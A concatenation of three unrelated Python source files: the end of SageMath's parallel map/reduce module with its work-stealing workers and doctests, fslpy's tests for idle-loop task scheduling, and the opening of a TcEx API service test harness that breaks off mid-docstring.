ActiveTaskCounter(value=2)
sage: S._signal_task_start()
sage: S._active_tasks
ActiveTaskCounter(value=3)
Signaling one time too many raises an :exc:`AbortError`::
sage: S._signal_task_done()
sage: S._signal_task_done()
sage: S._signal_task_done()
Traceback (most recent call last):
...
AbortError
"""
if self._active_tasks.task_start() == 0:
raise AbortError
def _signal_task_done(self):
r"""
Signal a task is done.
Used by the worker to signal that a task is done. As soon as
there are no more active tasks, the work is done, in which case an
:exc:`AbortError` is raised.
EXAMPLES::
sage: from sage.parallel.map_reduce import RESetParallelIterator
sage: S = RESetParallelIterator(
....: [[]],
....: lambda l: [l + [0], l + [1]] if len(l) < 20 else [])
sage: S.setup_workers(2)
sage: S._active_tasks
ActiveTaskCounter(value=2)
sage: S._signal_task_done()
sage: S._active_tasks
ActiveTaskCounter(value=1)
sage: S._signal_task_done()
Traceback (most recent call last):
...
AbortError
Cleanup::
sage: del S._results, S._active_tasks, S._done, S._workers
"""
# We test whether the semaphore counting the number of active tasks is
# becoming negative. This should not happen in normal
# computations. However, in case of abort, we artificially set the
# semaphore to 0 to stop the computation, so this check is needed.
if self._active_tasks.task_done() <= 0:
logger.debug("raising AbortError")
self._shutdown()
raise AbortError
def random_worker(self):
r"""
Return a random worker.
OUTPUT:
A worker for ``self`` chosen at random.
EXAMPLES::
sage: from sage.parallel.map_reduce import RESetMPExample, RESetMapReduceWorker
sage: from threading import Thread
sage: EX = RESetMPExample(maxl=6)
sage: EX.setup_workers(2)
sage: EX.random_worker()
<RESetMapReduceWorker(RESetMapReduceWorker-..., initial)>
sage: EX.random_worker() in EX._workers
True
Cleanup::
sage: del EX._results, EX._active_tasks, EX._done, EX._workers
"""
victim = random.randint(0, len(self._workers)-1)
return self._workers[victim]
def run(self,
max_proc=None,
reduce_locally=True,
timeout=None,
profile=None):
r"""
Run the computations.
INPUT:
- ``max_proc`` -- (integer, default: ``None``) if given, the
maximum number of worker processors to use. The actual number
is also bounded by the value of the environment variable
``SAGE_NUM_THREADS`` (the number of cores by default).
- ``reduce_locally`` -- See :class:`RESetMapReduceWorker` (default: ``True``)
- ``timeout`` -- a timeout on the computation (default: ``None``)
- ``profile`` -- directory/filename prefix for profiling, or ``None``
for no profiling (default: ``None``)
OUTPUT:
The result of the map/reduce computation or an exception
:exc:`AbortError` if the computation was interrupted or timed out.
EXAMPLES::
sage: from sage.parallel.map_reduce import RESetMPExample
sage: EX = RESetMPExample(maxl = 8)
sage: EX.run()
40320*x^8 + 5040*x^7 + 720*x^6 + 120*x^5 + 24*x^4 + 6*x^3 + 2*x^2 + x + 1
Here is an example of how to deal with a timeout::
sage: from sage.parallel.map_reduce import AbortError
sage: EX = RESetMPExample(maxl = 100)
sage: try:
....: res = EX.run(timeout=0.01)
....: except AbortError:
....: print("Computation timeout")
....: else:
....: print("Computation normally finished")
....: res
Computation timeout
The following should not timeout even on a very slow machine::
sage: from sage.parallel.map_reduce import AbortError
sage: EX = RESetMPExample(maxl = 8)
sage: try:
....: res = EX.run(timeout=60)
....: except AbortError:
....: print("Computation Timeout")
....: else:
....: print("Computation normally finished")
....: res
Computation normally finished
40320*x^8 + 5040*x^7 + 720*x^6 + 120*x^5 + 24*x^4 + 6*x^3 + 2*x^2 + x + 1
"""
self._profile = profile
self.setup_workers(max_proc, reduce_locally)
self.start_workers()
if timeout is not None:
from threading import Timer
self._timer = Timer(timeout, self.abort)
self._timer.start()
self.result = self.get_results(timeout=timeout)
if timeout is not None:
self._timer.cancel()
logger.info("Returning")
self.finish()
if self._aborted.value:
raise AbortError
else:
return self.result
def _get_stats(self):
r"""
Gather the communication statistics at the end of a run.
EXAMPLES::
sage: from sage.parallel.map_reduce import RESetMPExample
sage: S = RESetMPExample(maxl=6)
sage: S.run() # indirect doctest
720*x^6 + 120*x^5 + 24*x^4 + 6*x^3 + 2*x^2 + x + 1
"""
res = []
for i in range(self._nprocess):
res.append(tuple(self._workers[i]._stats))
self._stats = res
def print_communication_statistics(self, blocksize=16):
r"""
Print the communication statistics in a nice way.
EXAMPLES::
sage: from sage.parallel.map_reduce import RESetMPExample
sage: S = RESetMPExample(maxl=6)
sage: S.run()
720*x^6 + 120*x^5 + 24*x^4 + 6*x^3 + 2*x^2 + x + 1
sage: S.print_communication_statistics() # random
#proc: 0 1 2 3 4 5 6 7
reqs sent: 5 2 3 11 21 19 1 0
reqs rcvs: 10 10 9 5 1 11 9 2
- thefs: 1 0 0 0 0 0 0 0
+ thefs: 0 0 1 0 0 0 0 0
"""
res = [""] # classic trick to have a local variable shared with the
# local function (see e.g:
# https://stackoverflow.com/questions/2609518/python-nested-function-scopes).
def pstat(name, start, end, ist):
res[0] += ("\n" + name + " ".join(
"%4i" % (self._stats[i][ist]) for i in range(start, end)))
for start in range(0, self._nprocess, blocksize):
end = min(start+blocksize, self._nprocess)
res[0] = ("#proc: " +
" ".join("%4i" % (i) for i in range(start, end)))
pstat("reqs sent: ", start, end, 0)
pstat("reqs rcvs: ", start, end, 1)
pstat("- thefs: ", start, end, 2)
pstat("+ thefs: ", start, end, 3)
print(res[0])
def run_serial(self):
r"""
Run the computation serially (mostly for tests).
EXAMPLES::
sage: from sage.parallel.map_reduce import RESetMPExample
sage: EX = RESetMPExample(maxl = 4)
sage: EX.run_serial()
24*x^4 + 6*x^3 + 2*x^2 + x + 1
"""
import functools
return functools.reduce(self.reduce_function,
(self.map_function(x) for x in self._forest),
self.reduce_init())
class RESetMapReduceWorker(mp.Process):
"""
Worker for generate-map-reduce.
This shouldn't be called directly, but instead created by
:meth:`RESetMapReduce.setup_workers`.
INPUT:
- ``mapred`` -- the instance of :class:`RESetMapReduce` for which
this process is working.
- ``iproc`` -- the id of this worker.
- ``reduce_locally`` -- when to reduce the results. Two possible values
are supported:
* ``True`` -- means the reducing work is done all locally, the result is
only sent back at the end of the work. This ensures the lowest level of
communication.
* ``False`` -- results are sent back after each finished branch, when
the process is asking for more work.
"""
def __init__(self, mapred, iproc, reduce_locally):
r"""
TESTS::
sage: from sage.parallel.map_reduce import RESetMPExample, RESetMapReduceWorker
sage: EX = RESetMPExample()
sage: RESetMapReduceWorker(EX, 200, True)
<RESetMapReduceWorker(RESetMapReduceWorker-..., initial)>
"""
mp.Process.__init__(self)
self._iproc = iproc
self._todo = collections.deque()
self._request = mp.SimpleQueue() # Faster than Queue
# Currently it is not possible to have two simultaneous reads or writes
# on the following Pipe, so there is no need for a queue.
self._read_task, self._write_task = mp.Pipe(duplex=False)
self._mapred = mapred
self._stats = mp.RawArray('i', 4)
self._reduce_locally = reduce_locally
def _thief(self):
r"""
The target function executed by the thief thread of this worker process.
"""
logger.debug("Thief started")
reqs = 0
thefts = 0
try:
for ireq in iter(self._request.get, AbortError):
reqs += 1
target = self._mapred._workers[ireq]
logger.debug("Got a Steal request from %s" % target.name)
self._mapred._signal_task_start()
try:
work = self._todo.popleft()
except IndexError:
target._write_task.send(None)
logger.debug("Failed Steal %s" % target.name)
self._mapred._signal_task_done()
else:
target._write_task.send(work)
logger.debug("Succesful Steal %s" % target.name)
thefts += 1
except AbortError:
logger.debug("Thief aborted")
else:
logger.debug("Thief received poison pill")
if self._mapred._aborted.value: # Computation was aborted
self._todo.clear()
else: # Check that there is no remaining work
assert len(self._todo) == 0, "Bad stop: the result may be wrong"
self._stats[1] = reqs
self._stats[2] = thefts
logger.debug("Thief Exiting")
def steal(self):
r"""
Steal some node from another worker.
OUTPUT:
A node stolen from another worker chosen at random.
EXAMPLES::
sage: from sage.parallel.map_reduce import RESetMPExample, RESetMapReduceWorker
sage: from threading import Thread
sage: EX = RESetMPExample(maxl=6)
sage: EX.setup_workers(2)
sage: w0, w1 = EX._workers
sage: w0._todo.append(42)
sage: thief0 = Thread(target = w0._thief, name="Thief")
sage: thief0.start() # known bug (Trac #27537)
sage: w1.steal() # known bug (Trac #27537)
42
sage: w0._todo # known bug (Trac #27537)
deque([])
"""
self._mapred._signal_task_done()
node = None
while node is None:
victim = self._mapred.random_worker()
if victim is not self:
logger.debug("Trying to steal from %s" % victim.name)
victim._request.put(self._iproc)
self._stats[0] += 1
logger.debug("waiting for steal answer from %s" % victim.name)
node = self._read_task.recv()
# logger.debug("Request answer: %s" % (node,))
if node is AbortError:
raise AbortError
# logger.debug("Received a stolen node: %s" % (node,))
self._stats[3] += 1
return node
def run(self):
r"""
The main function executed by the worker.
Calls :meth:`run_myself` after possibly setting up parallel profiling.
EXAMPLES::
sage: from sage.parallel.map_reduce import RESetMPExample, RESetMapReduceWorker
sage: EX = RESetMPExample(maxl=6)
sage: EX.setup_workers(1)
sage: w = EX._workers[0]
sage: w._todo.append(EX.roots()[0])
sage: w.run()
sage: sleep(1)
sage: w._todo.append(None)
sage: EX.get_results()
720*x^6 + 120*x^5 + 24*x^4 + 6*x^3 + 2*x^2 + x + 1
Cleanups::
sage: del EX._results, EX._active_tasks, EX._done, EX._workers
"""
profile = self._mapred._profile
if profile is not None:
import cProfile
PROFILER = cProfile.Profile()
PROFILER.runcall(self.run_myself)
output = profile + str(self._iproc)
logger.warn("Profiling in %s ..." % output)
PROFILER.dump_stats(output)
else:
self.run_myself()
def run_myself(self):
r"""
The main function executed by the worker.
EXAMPLES::
sage: from sage.parallel.map_reduce import RESetMPExample, RESetMapReduceWorker
sage: EX = RESetMPExample(maxl=6)
sage: EX.setup_workers(1)
sage: w = EX._workers[0]
sage: w._todo.append(EX.roots()[0])
sage: w.run_myself()
sage: sleep(1)
sage: w._todo.append(None)
sage: EX.get_results()
720*x^6 + 120*x^5 + 24*x^4 + 6*x^3 + 2*x^2 + x + 1
Cleanups::
sage: del EX._results, EX._active_tasks, EX._done, EX._workers
"""
logger.debug("Started")
mapred = self._mapred
reduce_init = mapred.reduce_init
results = mapred._results
self._stats[0] = 0
self._stats[3] = 0
logger.debug("Launching thief")
self._thief = Thread(target = self._thief, name="Thief")
self._thief.start()
self._res = reduce_init()
try:
while True:
try:
node = self._todo.pop()
except IndexError:
node = self.steal()
self.walk_branch_locally(node)
if not self._reduce_locally:
self.send_partial_result()
except AbortError:
logger.debug("Worker Done !")
results.put(self._res)
results.put(None)
self._thief.join()
del self._request
self._read_task.close()
self._write_task.close()
del self._read_task, self._write_task
del self._mapred
del self._stats
logger.debug("Exiting")
def send_partial_result(self):
r"""
Send results to the MapReduce process.
Send the result stored in ``self._res`` to the master and reinitialize it to
``master.reduce_init``.
EXAMPLES::
sage: from sage.parallel.map_reduce import RESetMPExample, RESetMapReduceWorker
sage: EX = RESetMPExample(maxl=4)
sage: EX.setup_workers(1)
sage: w = EX._workers[0]
sage: w._res = 4
sage: w.send_partial_result()
sage: w._res
0
sage: EX._results.get()
4
"""
self._mapred._results.put(self._res)
self._res = self._mapred.reduce_init()
def walk_branch_locally(self, node):
r"""
Work locally.
Performs the map/reduce computation on the subtrees rooted at ``node``.
INPUT:
- ``node`` -- the root of the subtree explored.
OUTPUT:
Nothing; the result is stored in ``self._res``.
This is where the actual work is performed.
EXAMPLES::
sage: from sage.parallel.map_reduce import RESetMPExample, RESetMapReduceWorker
sage: EX = RESetMPExample(maxl=4)
sage: w = RESetMapReduceWorker(EX, 0, True)
sage: def sync(): pass
sage: w.synchronize = sync
sage: w._res = 0
sage: w.walk_branch_locally([])
sage: w._res
x^4 + x^3 + x^2 + x + 1
sage: w.walk_branch_locally(w._todo.pop())
sage: w._res
2*x^4 + x^3 + x^2 + x + 1
sage: while True: w.walk_branch_locally(w._todo.pop())
Traceback (most recent call last):
...
IndexError: pop from an empty deque
sage: w._res
24*x^4 + 6*x^3 + 2*x^2 + x + 1
"""
mapred = self._mapred
children = mapred.children
post_process = mapred.post_process
fun = mapred.map_function
reduc = mapred.reduce_function
# logger.debug("Working on %s..." % (node,))
while True:
res = post_process(node)
if res is not None:
self._res = reduc(self._res, fun(res))
newnodes = iter(children(node))
try:
node = next(newnodes)
except StopIteration:
return
self._todo.extend(newnodes)
class RESetMPExample(RESetMapReduce):
r"""
An example of map reduce class.
INPUT:
- ``maxl`` -- the maximum size of permutations generated (defaults to `9`).
This computes the generating series of permutations counted by their size
up to size ``maxl``.
EXAMPLES::
sage: from sage.parallel.map_reduce import RESetMPExample
sage: EX = RESetMPExample()
sage: EX.run()
362880*x^9 + 40320*x^8 + 5040*x^7 + 720*x^6 + 120*x^5
+ 24*x^4 + 6*x^3 + 2*x^2 + x + 1
.. SEEALSO:: This is an example of :class:`RESetMapReduce`
"""
def __init__(self, maxl = 9):
r"""
TESTS::
sage: from sage.parallel.map_reduce import RESetMPExample
sage: RESetMPExample()
<sage.parallel.map_reduce.RESetMPExample object at 0x...>
"""
RESetMapReduce.__init__(self)
from sage.rings.polynomial.polynomial_ring import polygen
from sage.rings.integer_ring import ZZ
self.x = polygen(ZZ, 'x')
self.maxl = maxl
def roots(self):
r"""
Return the empty permutation.
EXAMPLES::
sage: from sage.parallel.map_reduce import RESetMPExample
sage: RESetMPExample().roots()
[[]]
"""
return [[]]
def children(self, l):
r"""
Return the children of the permutation `l`.
INPUT:
- ``l`` -- a list containing a permutation
OUTPUT:
The lists with ``len(l)`` inserted at all possible positions into ``l``.
EXAMPLES::
sage: from sage.parallel.map_reduce import RESetMPExample
sage: RESetMPExample().children([1,0])
[[2, 1, 0], [1, 2, 0], [1, 0, 2]]
"""
return [ l[:i] + [len(l)] + l[i:]
for i in range(len(l)+1) ] if len(l) < self.maxl else []
def map_function(self, l):
r"""
The monomial associated to the permutation `l`.
INPUT:
- ``l`` -- a list containing a permutation
OUTPUT:
The monomial ``x^len(l)``.
EXAMPLES::
sage: from sage.parallel.map_reduce import RESetMPExample
sage: RESetMPExample().map_function([1,0])
x^2
"""
return self.x**len(l)
class RESetParallelIterator(RESetMapReduce):
r"""
A parallel iterator for recursively enumerated sets.
This demonstrates how to use :class:`RESetMapReduce` to get an iterator on
a recursively enumerated set for which the computations are done in
parallel.
EXAMPLES::
sage: from sage.parallel.map_reduce import RESetParallelIterator
sage: S = RESetParallelIterator([[]],
....: lambda l: [l + [0], l + [1]] if len(l) < 15 else [])
sage: sum(1 for _ in S)
65535
"""
def map_function(self, z):
r"""
Return a singleton tuple.
INPUT:
- ``z`` -- a node
OUTPUT:
The singleton ``(z, )``.
EXAMPLES::
sage: from sage.parallel.map_reduce import RESetParallelIterator
sage: S = RESetParallelIterator( [[]],
....: lambda l: [l + [0], l + [1]] if len(l) < 15 else [])
sage: S.map_function([1, 0])
([1, 0],)
"""
return (z,)
reduce_init = tuple
def __iter__(self):
r"""
EXAMPLES::
sage: from sage.parallel.map_reduce import RESetParallelIterator
sage: S = RESetParallelIterator( [[]],
....: lambda l: [l + [0], l + [1]] if len(l) < 15 else [])
sage: it = iter(S)
sage: next(it) # random
[1, 1, 0]
sage: next(it) # random
[1, 1, 0, 1]
sage: sum(1 for _ in it)
65533
"""
self.setup_workers(reduce_locally=False)
self.start_workers()
active_proc = self._nprocess
while True:
newres = self._results.get()
if newres is not None:
logger.debug("Got some results")
for r in newres:
yield r
else:
active_proc -= 1
if active_proc == 0:
break
self.finish()
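# --- Hedged usage sketch (not part of the original module) ---------------
# The classes above exercise RESetMapReduce through subclassing; the same
# API also accepts the search space and map/reduce functions as keyword
# arguments, as in this doctest-style sketch counting the 15 binary words
# of length at most 3:
#
# sage: from sage.parallel.map_reduce import RESetMapReduce
# sage: S = RESetMapReduce(
# ....:     roots=[[]],
# ....:     children=lambda l: [l + [0], l + [1]] if len(l) < 3 else [],
# ....:     map_function=lambda l: 1,
# ....:     reduce_function=lambda x, y: x + y,
# ....:     reduce_init=0)
# sage: S.run()
# 15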
|
test_idle.py | #!/usr/bin/env python
#
# test_idle.py -
#
# Author: Paul McCarthy <pauldmccarthy@gmail.com>
#
import gc
import time
import threading
import random
import importlib
import pytest
from unittest import mock
import fsl.utils.idle as idle
from fsl.utils.platform import platform as fslplatform
def _run_with_wx(func, *args, **kwargs):
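# Test harness: create a temporary wx App and Frame, schedule ``func`` to
# run shortly after the main loop starts, tear everything down afterwards,
# and re-raise any exception ``func`` raised (unless propagateRaise=False).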
gc.collect()
propagateRaise = kwargs.pop('propagateRaise', True)
startingDelay = kwargs.pop('startingDelay', 500)
finishingDelay = kwargs.pop('finishingDelay', 500)
callAfterApp = kwargs.pop('callAfterApp', None)
import wx
result = [None]
raised = [None]
app = [wx.App()]
frame = wx.Frame(None)
if callAfterApp is not None:
callAfterApp()
# canHaveGui caches its return val,
# so clear it otherwise we may
# affect subsequent tests
idle._canHaveGui.cache_clear()
def wrap():
try:
if func is not None:
result[0] = func(*args, **kwargs)
except Exception as e:
print(e)
raised[0] = e
finally:
def finish():
frame.Destroy()
app[0].ExitMainLoop()
wx.CallLater(finishingDelay, finish)
frame.Show()
wx.CallLater(startingDelay, wrap)
app[0].MainLoop()
time.sleep(1)
idle.idleLoop.reset()
idle._canHaveGui.cache_clear()
if raised[0] and propagateRaise:
raise raised[0]
del app[0]
return result[0]
def _run_without_wx(func, *args, **kwargs):
with mock.patch.dict('sys.modules', wx=None):
return func(*args, **kwargs)
def _wait_for_idle_loop_to_clear():
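# Queue a sentinel task on the idle loop and keep yielding to wx until it
# has run; once the sentinel fires, everything queued before it has been
# processed.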
if fslplatform.haveGui:
import wx
idleDone = [False]
def busywait():
idleDone[0] = True
idle.idle(busywait)
while not idleDone[0]:
wx.GetApp().Yield()
@pytest.mark.wxtest
def test_run_with_gui(): _run_with_wx( _test_run)
def test_run_without_gui(): _run_without_wx(_test_run)
def _test_run():
taskRun = [False]
onFinishCalled = [False]
onErrorCalled = [False]
def task():
taskRun[0] = True
def errtask():
taskRun[0] = True
raise Exception('Task which was supposed to crash crashed!')
def onFinish():
onFinishCalled[0] = True
def onError(e):
onErrorCalled[0] = True
t = idle.run(task)
if t is not None:
t.join()
assert taskRun[0]
taskRun[0] = False
t = idle.run(task, onFinish, onError)
if t is not None:
t.join()
_wait_for_idle_loop_to_clear()
taskRun[ 0] = False
onFinishCalled[0] = False
t = idle.run(errtask, onFinish, onError)
if t is not None:
t.join()
_wait_for_idle_loop_to_clear()
assert taskRun[ 0]
assert not onFinishCalled[0]
assert onErrorCalled[ 0]
@pytest.mark.wxtest
def test_callRate_with_gui(): _run_with_wx( _test_callRate)
def test_callRate_without_gui(): _run_without_wx(_test_callRate)
def _test_callRate():
idle.idleLoop.reset()
default = idle.idleLoop.callRate
idle.idleLoop.callRate = 999
assert idle.idleLoop.callRate == 999
idle.idleLoop.callRate = None
assert idle.idleLoop.callRate == default
@pytest.mark.wxtest
def test_block_with_gui(): _run_with_wx( _test_block)
def test_block_without_gui(): _run_without_wx(_test_block)
def _test_block():
called = [False]
if fslplatform.haveGui:
import wx
def idlefunc():
called[0] = True
wx.CallLater(1000, idlefunc)
start = time.time()
idle.block(2)
end = time.time()
# Be relaxed about precision - timing
# can sometimes be pretty sloppy when
# running in a docker container.
assert abs((end - start) - 2) < 0.05
if fslplatform.haveGui:
assert called[0]
@pytest.mark.wxtest
def test_block_until_with_gui(): _run_with_wx( _test_block_until)
def test_block_until_without_gui(): _run_without_wx(_test_block_until)
def _test_block_until():
ev = threading.Event()
def task():
time.sleep(1)
ev.set()
threading.Thread(target=task).start()
start = time.time()
idle.block(3, until=ev.is_set)
end = time.time()
assert end - start < 3
@pytest.mark.wxtest
def test_idle():
called = [False]
def task(arg, kwarg1=None):
called[0] = arg == 1 and kwarg1 == 2
def errtask(arg, kwarg1=None):
raise Exception('Task which was supposed to crash crashed!')
assert idle.idleLoop.callRate > 0
# Run directly
_run_without_wx(idle.idle, task, 1, kwarg1=2, name='direct')
assert called[0]
called[0] = False
# Run on wx idle loop
_run_with_wx(idle.idle, task, 1, kwarg1=2)
assert called[0]
# Run a crashing task directly
with pytest.raises(Exception):
idle.idle(errtask, 1, kwarg1=2)
# Run a crashing task on idle loop - error should not propagate
_run_with_wx(idle.idle, errtask, 1, kwarg1=2)
@pytest.mark.wxtest
def test_inidle():
called = [False]
name = 'mytask'
def task():
called[0] = True
def queuetask():
idle.idle(task, after=0.01, name=name)
assert idle.idleLoop.inIdle(name)
_run_with_wx(queuetask)
assert called[0]
@pytest.mark.wxtest
def test_cancelidle():
called = [False]
name = 'mytask'
def task():
called[0] = True
def queuetask():
idle.idle(task, after=0.01, name=name)
idle.idleLoop.cancelIdle(name)
_run_with_wx(queuetask)
assert not called[0]
@pytest.mark.wxtest
def test_idle_skipIfQueued():
task1called = [False]
task2called = [False]
name = 'mytask'
def task1():
task1called[0] = True
def task2():
task2called[0] = True
def queuetask():
idle.idle(task1, after=0.01, name=name)
idle.idle(task2, after=0.01, name=name, skipIfQueued=True)
_run_with_wx(queuetask)
assert task1called[0]
assert not task2called[0]
@pytest.mark.wxtest
def test_idle_dropIfQueued():
task1called = [False]
task2called = [False]
name = 'mytask'
def task1():
print('task1 called')
task1called[0] = True
def task2():
print('task2 called')
task2called[0] = True
def queuetask():
print('Queuetask running')
idle.idle(task1, after=0.01, name=name)
idle.idle(task2, after=0.01, name=name, dropIfQueued=True)
print('Queuetask finished')
import sys
print('running with wx')
sys.stdout.flush()
_run_with_wx(queuetask)
print('run with wx finished')
sys.stdout.flush()
assert not task1called[0]
assert task2called[0]
@pytest.mark.wxtest
def test_idle_alwaysQueue1():
# Test scheduling the task before
# a wx.App has been created.
called = [False]
def task():
called[0] = True
# In this scenario, an additional call
# to idle (after the App has been created)
# is necessary, otherwise the originally
# queued task will not be called.
def nop():
pass
# The task should be run
# when the mainloop starts
idle.idle(task, alwaysQueue=True)
# Second call to idle.idle
_run_with_wx(idle.idle, nop)
assert called[0]
@pytest.mark.wxtest
def test_idle_alwaysQueue2():
# Test scheduling the task
# after a wx.App has been created,
# but before MainLoop has started
called = [False]
def task():
called[0] = True
def queue():
idle.idle(task, alwaysQueue=True)
_run_with_wx(None, callAfterApp=queue)
assert called[0]
@pytest.mark.wxtest
def test_idle_alwaysQueue3():
# Test scheduling the task
# after a wx.App has been created
# and the MainLoop has started.
# In this case, alwaysQueue should
# have no effect - the task should
# just be queued and executed as
# normal.
called = [False]
def task():
called[0] = True
_run_with_wx(idle.idle, task, alwaysQueue=True)
assert called[0]
@pytest.mark.wxtest
def test_idle_alwaysQueue4():
# Test scheduling the task when
# wx is not present - the task
# should just be executed immediately
called = [False]
def task():
called[0] = True
import fsl.utils.platform
with mock.patch.dict('sys.modules', {'wx' : None}):
# The idle._canHaveGui caches its result,
# so we need to invalidate it
idle._canHaveGui.cache_clear()
idle.idle(task, alwaysQueue=True)
with pytest.raises(ImportError):
import wx
importlib.reload(fsl.utils.platform)
assert called[0]
@pytest.mark.wxtest
def test_neverQueue(): _run_with_wx(_test_neverQueue)
def _test_neverQueue():
called = [False]
def task():
called[0] = True
oldval = idle.idleLoop.neverQueue
try:
idle.idleLoop.neverQueue = True
idle.idle(task)
assert called[0]
idle.idleLoop.neverQueue = False
called[0] = False
idle.idle(task)
assert not called[0]
_wait_for_idle_loop_to_clear()
assert called[0]
finally:
idle.idleLoop.neverQueue = oldval
@pytest.mark.wxtest
def test_synchronous(): _run_with_wx(_test_synchronous)
def _test_synchronous():
called = [False]
def task():
called[0] = True
def test_async():
called[0] = False
idle.idle(task)
assert not called[0]
_wait_for_idle_loop_to_clear()
assert called[0]
oldval = idle.idleLoop.neverQueue
try:
idle.idleLoop.neverQueue = False
test_async()
with idle.idleLoop.synchronous():
called[0] = False
idle.idle(task)
assert called[0]
test_async()
finally:
idle.idleLoop.neverQueue = oldval
@pytest.mark.wxtest
def test_idle_timeout():
called = [False]
def task():
called[0] = True
_run_with_wx(idle.idle, task, timeout=0.0000000000000001)
assert not called[0]
@pytest.mark.wxtest
def test_idleWhen():
called = [False]
timesPolled = [0]
def condition():
timesPolled[0] += 1
return timesPolled[0] == 50
def task():
called[0] = True
idle.idleLoop.callRate = 1
_run_with_wx(idle.idleWhen, task, condition, pollTime=0.001)
assert called[0]
assert timesPolled[0] == 50
@pytest.mark.wxtest
def test_wait_with_gui(): _run_with_wx(_test_wait, finishingDelay=1100)
def test_wait_without_gui(): _test_wait()
def _test_wait():
ntasks = 10
def threadtask(num):
time.sleep(random.random())
threadtaskscalled[num] = True
def waittask():
waittaskcalled[0] = True
for wait_direct in [False, True]:
threadtaskscalled = [False] * ntasks
waittaskcalled = [False]
threads = [threading.Thread(target=threadtask, args=(n,))
for n in range(ntasks)]
for t in threads:
t.start()
t = idle.wait(threads, waittask, wait_direct=wait_direct)
if t is not None:
t.join()
_wait_for_idle_loop_to_clear()
assert all(threadtaskscalled)
assert waittaskcalled[0]
def test_TaskThread():
called = [False]
def task():
called[0] = True
tt = idle.TaskThread()
tt.start()
tt.enqueue(task)
time.sleep(0.5)
tt.stop()
tt.join()
assert called[0]
def test_TaskThread_onFinish():
taskCalled = [False]
onFinishCalled = [False]
def task():
taskCalled[0] = True
def onFinish():
onFinishCalled[0] = True
tt = idle.TaskThread()
tt.start()
tt.enqueue(task, onFinish=onFinish)
time.sleep(0.5)
tt.stop()
tt.join()
assert taskCalled[0]
assert onFinishCalled[0]
def test_TaskThread_onError():
taskCalled = [False]
onFinishCalled = [False]
onErrorCalled = [False]
def task():
taskCalled[0] = True
raise Exception('Task error')
def onFinish():
onFinishCalled[0] = True
def onError(e):
onErrorCalled[0] = str(e)
tt = idle.TaskThread()
tt.start()
tt.enqueue(task, onFinish=onFinish, onError=onError)
time.sleep(0.5)
tt.stop()
tt.join()
assert taskCalled[0]
assert onErrorCalled[0] == 'Task error'
assert not onFinishCalled[0]
def test_TaskThread_isQueued():
called = [False]
def busyTask():
time.sleep(0.5)
def realTask():
called[0] = True
tt = idle.TaskThread()
tt.start()
tt.enqueue(busyTask)
tt.enqueue(realTask, taskName='realTask')
time.sleep(0.25)
queued = tt.isQueued('realTask')
time.sleep(0.3)
tt.stop()
tt.join()
assert queued
assert called[0]
def test_TaskThread_dequeue():
called = [False]
def busyTask():
time.sleep(0.5)
def realTask():
called[0] = True
tt = idle.TaskThread()
tt.start()
tt.enqueue(busyTask)
tt.enqueue(realTask, taskName='realTask')
time.sleep(0.25)
tt.dequeue('realTask')
time.sleep(0.3)
tt.stop()
tt.join()
assert not called[0]
def test_TaskThread_TaskVeto():
taskCalled = [False]
onFinishCalled = [False]
def task():
taskCalled[0] = True
raise idle.TaskThreadVeto()
def onFinish():
onFinishCalled[0] = True
tt = idle.TaskThread()
tt.start()
tt.enqueue(task, onFinish=onFinish)
time.sleep(0.5)
tt.stop()
tt.join()
assert taskCalled[0]
assert not onFinishCalled[0]
def test_mutex():
class Thing(object):
@idle.mutex
def method1(self):
self.method1start = time.time()
time.sleep(0.01)
self.method1end = time.time()
@idle.mutex
def method2(self):
self.method2start = time.time()
time.sleep(0.01)
self.method2end = time.time()
for i in range(200):
t = [Thing()]
def thread1():
t[0].method1()
def thread2():
t[0].method2()
for i in range(10):
t[0].method1start = None
t[0].method2start = None
t[0].method1end = None
t[0].method2end = None
t1 = threading.Thread(target=thread1)
t2 = threading.Thread(target=thread2)
t1.start()
t2.start()
t1.join()
t2.join()
# Either t1 has to start and
# finish before t2 or vice versa
assert (t[0].method2start >= t[0].method1end or
t[0].method1start >= t[0].method2end)
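# --- Hedged sketch (illustration only, not fslpy's implementation) -------
# test_mutex above only requires that two @idle.mutex methods on the same
# instance never run concurrently. A minimal pure-threading decorator with
# that property, for comparison (the name _example_mutex is hypothetical):
#
#     import functools
#
#     def _example_mutex(method):
#         @functools.wraps(method)
#         def wrapper(self, *args, **kwargs):
#             # dict.setdefault is atomic under the GIL, so racing first
#             # calls still agree on one lock per instance
#             lock = self.__dict__.setdefault('_lock', threading.Lock())
#             with lock:
#                 return method(self, *args, **kwargs)
#         return wrapper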
|
test_case_api_service.py | """TcEx Service Common Module"""
# standard library
import http.server
import json
import os
import socketserver
import sys
import time
from threading import Event, Thread
from typing import Optional
from urllib.parse import parse_qs, urlparse
from uuid import uuid4
# third-party
from requests.auth import HTTPBasicAuth
# first-party
from tcex.sessions import ExternalSession
from .test_case_service_common import TestCaseServiceCommon
class ApiServer(socketserver.ThreadingMixIn, http.server.HTTPServer):
"""HTTP Server for testing API Services"""
allow_reuse_address = True
def __init__(self, test_case: object, bind_addr: tuple):
"""Initialize Class properties
Args:
test_case: The test_case object.
bind_addr: The binding address w/ port.
"""
super().__init__(bind_addr, RequestHandler)
self.test_case = test_case
# properties
self._host = bind_addr[0]
self._port = bind_addr[1]
self.active_requests = {}
self.active_responses = {}
self.args = test_case.default_args
self.log = test_case.log
self.message_broker = test_case.message_broker
self.mqtt_client = test_case.message_broker.client
# start server thread
service = Thread(group=None, target=self.run, name='SimpleServerThread', daemon=True)
service.start()
def listen(self):
"""List for message coming from broker."""
self.message_broker.add_on_connect_callback(self.on_connect)
self.message_broker.add_on_message_callback(
callback=self.on_message, topics=[self.test_case.client_topic]
)
t = Thread(name='broker-listener', target=self.message_broker.connect, args=(), daemon=True)
t.start()
def on_connect(self, client, userdata, flags, rc): # pylint: disable=unused-argument
"""Handle message broker on_connect events."""
# subscribe to client topic
client.subscribe(self.test_case.client_topic)
def on_message(self, client, userdata, message): # pylint: disable=unused-argument
"""Handle message broker on_message events."""
try:
m = json.loads(message.payload)
except ValueError:
raise RuntimeError(f'Could not parse API service response JSON. ({message})')
# only process RunService Acknowledged commands.
if m.get('command').lower() == 'acknowledged' and m.get('type').lower() == 'runservice':
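# store the response, then set() the Event created in call_service() to
# release the RequestHandler thread blocked in event.wait()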
self.active_responses[m.get('requestKey')] = m
self.active_requests.pop(m.get('requestKey')).set()
def run(self):
"""Run the server in threat."""
print(f'\nRunning server: http://{self._host}:{self._port}')
self.serve_forever()
class RequestHandler(http.server.BaseHTTPRequestHandler):
"""Request handler to forward request to API service."""
def _build_request(self, method: str) -> dict:
"""Return request built from incoming HTTP request.
{
